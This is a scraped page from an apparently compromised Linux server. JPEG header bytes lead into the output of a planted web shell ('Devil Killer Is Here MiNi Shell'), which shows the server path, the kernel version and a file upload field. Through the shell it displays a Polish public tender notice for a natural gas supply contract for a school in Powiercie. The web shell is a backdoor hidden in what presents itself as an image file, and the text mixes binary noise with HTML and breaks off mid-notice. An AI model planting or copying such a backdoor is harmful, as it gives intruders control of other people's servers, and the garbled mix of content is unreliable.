JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211207/0030191301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Kompleksowa dostawa gazu ziemnego wysokometanowego (grupa E)<br/>dla Szkoły Podstawowej im. Orła Białego w Powierciu<br/>na okres od 01.01.2022 do 31.08.2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa im. Orła Białego w Powierciu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001144793</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powiercie 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">632728525</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zs.powiercie@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sppowiercie.szkolnastrona.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Szkoła Publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa dostawa gazu ziemnego wysokometanowego (grupa E)<br/>dla Szkoły Podstawowej im. Orła Białego w Powierciu<br/>na okres od 01.01.2022 do 31.08.2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-addb2da9-572d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00301913</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00035408/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Kompleksowa dostawa gazu ziemnego wysokometanowego (grupa E) dla Szkoły Podstawowej im. Orła Białego w Powierciu na okres od 01.01.2022 do 31.08.2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_kolo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_kolo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.1.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej.<br/>Komunikacja między zamawiającym a wykonawcami, w niniejszym postępowaniu w tym składanie<br/>ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a<br/>wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej tj. za pośrednictwem platformy<br/>zakupowej pod adresem: https://platformazakupowa.pl/pn/gmina_kolo<br/>10.2. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich przesłania za pośrednictwem platformy zakupowej poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego.<br/>10.3. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem platformy zakupowejInformacje dotyczące odpowiedzi na pytania, zmiany SWZ,<br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie zakupowej w<br/>sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformy<br/>zakupowej do konkretnego wykonawcy.<br/>10.4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na platformie zakupowej przesłanych przez zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>10.5. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia oraz udostępnienia i przechowywania dokumentów elektronicznych, dalej: “Rozporządzenie w sprawie środków<br/>komunikacji”, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie<br/>zakupowej tj.:<br/>10.5.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>10.5.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel<br/>IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4,<br/>Linux, lub ich nowsze wersje,<br/>10.5.3. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie<br/>wersja 10 0.,<br/>10.5.4. włączona obsługa JavaScript,<br/>10.5.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>10.5.6. szyfrowanie na platformie zakupowej odbywa się za pomocą protokołu TLS 1.3.,<br/>10.5.7. oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>10.6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia:<br/>10.6.1. akceptuje warunki korzystania z platformy zakupowej określone w Regulaminie<br/>zamieszczonym na stronie internetowej https://platformazakupowa.pl/strona/1-regulamin oraz uznaje<br/>go za wiążący,<br/>10.6.2. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>Pełna informacja z rozdziale 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">31.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>31.1.1. Administratorem Pani/Pana danych osobowych jest: Szkoła Podstawowa im. Orła Białego w<br/>Powierciu, Powiercie 3, 62-600 Koło<br/>31.1.2. W sprawie ochrony swoich danych osobowych może Pan/Pani kontaktować się z wyznaczonym<br/>Inspektorem Ochrony Danych, e-mail: zs.powiercie@wp.pl<br/>31.1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Kompleksowa dostawa gazu<br/>ziemnego wysokometanowego (grupa E) dla Szkoły Podstawowej im. Orła Białego w Powierciu na<br/>okres od 01.01.2022 do 31.08.2022 r.” prowadzonym w trybie podstawowym,<br/>31.1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu ustawę Pzp,<br/>31.1.5. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego,<br/>31.1.6. Niezależnie od postanowień ppkt 31.1.5. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego,<br/>31.1.7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp,<br/>31.1.8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>31.1.9. Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>31.1.10. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>31.1.11. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub<br/>innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do<br/>podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">4/ZP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem zamówienia jest kompleksowa dostawa gazu ziemnego wysokometanowego<br/>(grupa E) dostawa paliwa gazowego wraz z usługą dystrybucji do obiektów Zamawiającego -<br/>wynosząca dla zamówienia planowanego 334 333 kWh w okresie od 01.01.2022 do 31.08.2022<br/>r.<br/>4.2. Gaz grupy E powinien być dostarczony całodobowo do punktów zdawczo – odbiorczych,<br/>wymienionych w załączniku nr 1 do SWZ, którym jest zespół urządzeń gazowych służących do<br/>przyłączenia sieci wewnętrznej, będącą własnością Zamawiającego z siecią gazową operatora<br/>systemu.<br/>4.3. Wykonawca zobowiązany będzie do zapewnienia standardów jakości obsługi<br/>Zamawiającego zgodnie z obowiązującymi w tym zakresie przepisami prawa energetycznego.<br/>Winien zapewnić ciągłość dostaw bez jakichkolwiek przerw w dostawach za wyjątkiem sytuacji<br/>opisanych w ustawie Prawo energetyczne, IRIESD, taryfie i posiadać rezerwę gwarantującą<br/>ciągłość dostaw.<br/>4.4. Własność paliwa gazowego przechodzi na Zamawiającego po dokonaniu pomiaru na<br/>wyjściu z gazomierza.<br/>4.5. Wielkość zużycia gazu dla zamówienia wynosi 334 333 kWh w ciągu 8 miesięcy dla<br/>obiektów wymienionych w załączniku nr 1 do SWZ. Zapotrzebowanie na paliwo gazowe przyjęte<br/>zostało na podstawie historycznego zużycia paliwa gazowego i może odbiegać od faktycznego<br/>wykorzystania paliwa gazowego, bowiem nie można z góry ustalić ilości paliwa gazowego, które<br/>zostanie dostarczone Zamawiającemu. Ilość zamówienia nie stanowi ze strony Zamawiającego<br/>zobowiązania do zakupu paliwa gazowego w podanej ilości i w żadnym razie nie może być<br/>podstawą jakichkolwiek roszczeń ze strony Wykonawcy.<br/>4.6. W toku realizacji zamówienia zamawiający zastrzega sobie prawo do zmniejszenia lub<br/>zwiększenia łącznej ilości zakupionego paliwa gazowego i/lub wartości dystrybucji zakupionego<br/>paliwa gazowego w zakresie: dla zwiększenia do 20%, dla zmniejszenia do 20% względem ilości<br/>(wartości) zamówienia określonego w załączniku nr 1 do SWZ (zamówienie planowane).<br/>Zaistnienie okoliczności, o której mowa powyżej, spowoduje odpowiednio zmniejszenie lub<br/>zwiększenie wynagrodzenia należnego wykonawcy z tytułu niniejszej umowy. Zmiana ilości<br/>paliwa gazowego następuje automatycznie i nie wymaga oświadczenia strony. W ramach<br/>niniejszego prawa zamawiający może dodawać i odejmować PPG oraz dokonać zmian<br/>parametrów dystrybucji gazu, w takim przypadku zamawiający złoży wykonawcy pisemne<br/>oświadczenie woli w przedmiocie skorzystania z powyższego prawa w określonym przez niego<br/>zakresie. Zmiany grupy taryfowej, zgodnie z zasadami określonymi w taryfach zatwierdzonych<br/>przez prezesa urzędu regulacji energetyki nie wymagają złożenia przez zamawiającego<br/>oświadczenia woli. W przypadku nieskorzystania przez zamawiającego z prawa do zmniejszenia<br/>lub zwiększenia łącznej ilości zakupionego paliwa gazowego i/lub wartości dystrybucji<br/>zakupionego paliwa gazowego w zakresie dla zwiększenia do 20%, dla zmniejszenia do 20%<br/>względem ilości zamówienia planowanego wykonawcy nie przysługują żadne roszczenia z tego<br/>tytułu.<br/>4.7. Rozliczenia za sprzedaż i dystrybucję paliwa gazowego odbywać się będą na podstawie<br/>bieżących wskazań układu pomiarowo-rozliczeniowego (danych przekazywanych przez<br/>operatora systemu dystrybucyjnego zwanego dalej „osd”), zgodnie z okresami rozliczeniowymi<br/>wynikającymi z bieżącej taryfy osd, przy czym dla taryf z liczbą odczytów w roku 1 i 2 jest<br/>możliwe rozliczenie na podstawie szacunkowego (prognozowanego) zużycia – na wniosek<br/>Zamawiającego, złożony w dniu zawarcia lub obowiązywania umowy na kompleksową dostawę<br/>gazu ziemnego z wyłonionym w niniejszym postępowaniu Wykonawcą. W takim przypadku<br/>ostateczne rozlicznie za dany okres rozliczeniowy nastąpi na podstawie wystawionej przez<br/>Wykonawcę faktury rozliczeniowej po uzyskaniu danych pomiarowych od OSD, która będzie<br/>uwzględniać ilość faktycznie pobranego przez Odbiorcę paliwa gazowego.<br/>4.8. Adresy PPG, grupy taryfowe, dane o umowach, zużycie oraz inne niezbędne informacje<br/>zawiera załącznik nr 1 do SWZ.<br/>4.9. Wykonawca zobowiązuje się do przeprowadzenia procedury zmiany sprzedawcy paliw<br/>gazowych, zgodnie z Instrukcją Ruchu i Eksploatacji Sieci Dystrybucyjnej (IRiESD) w zakresie<br/>świadczenia i korzystania z usług dystrybucji paliwa gazowego - dane o umowach zawarte są w<br/>załączniku nr 1 do SWZ.<br/>4.10. Dostarczony gaz ziemny powinien spełniać wymagania prawne i parametry techniczne<br/>zgodnie z postanowieniami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne i aktami<br/>wykonawczymi wydanymi na jej podstawie oraz Ustawy z dnia 16 lutego 2007 r. o zapasach<br/>ropy naftowej, produktów naftowych i gazu ziemnego oraz zasadach postępowania w sytuacjach<br/>zagrożenia bezpieczeństwa paliwowego państwa i zakłóceń na rynku naftowymi aktami<br/>wykonawczymi wydanymi na jej podstawie oraz niektórych innych ustaw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09123000-7 - Gaz ziemny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65210000-8 - Przesył gazu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował kryterium ceny oferty brutto za realizację przedmiotu zamówienia obliczonej przez<br/>Wykonawcę zgodnie zobowiązującymi przepisami prawa, zasadami określonymi w Rozdziale 16 SWZ i<br/>podanej w formularzu ofertowym (wzór –wg załącznika nr 3 do SWZ).<br/>17.2. Zamawiający za najkorzystniejszą uzna ofertę z najniższą ceną, wśród ofert nie odrzuconych i<br/>wykonawców, którzy nie zostali wykluczeni z postępowania o udzielenie zamówienia.<br/>17.3. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %.<br/>17.4. Uzyskana liczba punktów w ramach kryterium zaokrąglana będzie do drugiego miejsca po<br/>przecinku - jeżeli trzecia cyfra po przecinku (i/lub następna) jest mniejsza od 5 wynik zostanie<br/>zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>17.5. Zamawiający udzieli zamówienia wykonawcy, którego oferta odpowiada wszystkim wymaganiom<br/>określonym w ustawie Pzp oraz w niniejszej SWZ i została oceniona jako najkorzystniejsza w oparciu o<br/>podane w ogłoszeniu o zamówieniu i SWZ kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu w zakresie:<br/>6.1.1. zdolności do występowania w obrocie gospodarczym: zamawiający nie stawia warunku w<br/>tym zakresie,<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>a) wykonawca winien posiadać uprawnienia do wykonywania działalności gospodarczej w<br/>zakresie obrotu paliwem gazowym, na podstawie koncesji wydanej przez Prezesa Urzędu<br/>Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne,<br/>b) w przypadku wspólnego ubiegania się wykonawców o zamówienie warunek z ppkt a) zostanie<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej i<br/>zrealizuje dostawy, do których realizacji te uprawnienia są wymagane,<br/>6.1.3. sytuacji ekonomicznej lub finansowej: zamawiający nie stawia warunku w tym zakresie,<br/>6.1.4. zdolności technicznej lub zawodowej: zamawiający nie stawia warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.6. Wraz z ofertą stanowiącą Załącznik nr 3 do SWZ (formularz 